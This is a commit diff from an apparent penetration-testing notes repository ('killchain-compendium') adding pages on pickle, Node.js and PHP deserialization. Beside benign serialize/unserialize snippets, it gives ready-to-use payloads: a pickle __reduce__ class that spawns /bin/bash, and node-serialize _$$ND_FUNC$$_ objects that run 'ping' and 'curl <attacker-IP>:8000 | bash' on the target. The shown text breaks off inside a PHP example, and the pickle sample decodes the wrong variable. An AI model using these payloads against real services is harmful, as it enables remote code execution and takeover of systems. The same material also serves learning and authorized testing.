whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

details on pickle and php serialize

This commit is contained in:
gurkenhabicht 2024-05-07 21:38:46 +02:00
parent 815f0cdae6
commit 6734e25c2d
3 changed files with 52 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
Exploits/Python/Pickle.md
View File

@ -1,7 +1,25 @@
# Pickle # Pickle
Serializes a Python object into a byte stream an back.
When sending pickled data through a network do base64 encoding first to prevent
special characters to do something unexpected.
```python
import pickle
import base64
text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)
```
## Payload ## Payload
* Inject payload
The following payload can be injected into a pickled object.
```python ```python
import pickle import pickle
import os import os
@ -10,12 +28,12 @@ class evil_object(object):
def __reduce__(self): def __reduce__(self):
return(os.system, ('/bin/bash',)) return(os.system, ('/bin/bash',))
x = evil_object() x = evil_object()
x = evil_object()
y = pickle.dumps(x) y = pickle.dumps(x)
base64.b64encode(y) base64.b64encode(y)
``` ```
* Dump serialized object via * Dump serialized object via
```python ```python
pickle.dump(SerializedPickle(), open('pickled.out', 'wb') pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
``` ```

5
Exploits/Web/Node.js Deserialization.md
View File

@ -5,10 +5,13 @@
## Example Payloads ## Example Payloads
* Encode, send and wait with `sudo tcpdump -i <interface> icmp` * Encode, send and wait with `sudo tcpdump -i <interface> icmp`
```js ```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"} {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
``` ```
* reverse shell via
Reverse shell via
```js ```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"} {"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
``` ```

30
Exploits/Web/PHP Deserialize.md
View File

@ -1,8 +1,34 @@
# Unserialize # PHP (De-)Serialization
A basic example of (de-)serialization is the following
Serialize is show in the following snippet.
```php
<?php
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
$serialized = serialize($plain_text);
file_put_contents('serialized.txt', $serialized);
?>
```
Deserialize is done in the following snippet.
```php
<?php
$serialized = file_get_contents('serialized.txt');
$plain_text = unserialize($serialized);
echo "Title: " . $plain_text['title'];
echo "Content: " . $plain_text['content'];
?>
```
## Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize) * [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
* Serialize via Serialize a form on a website through PHP via
```php ```php
<?php <?php
class FormSubmit { class FormSubmit {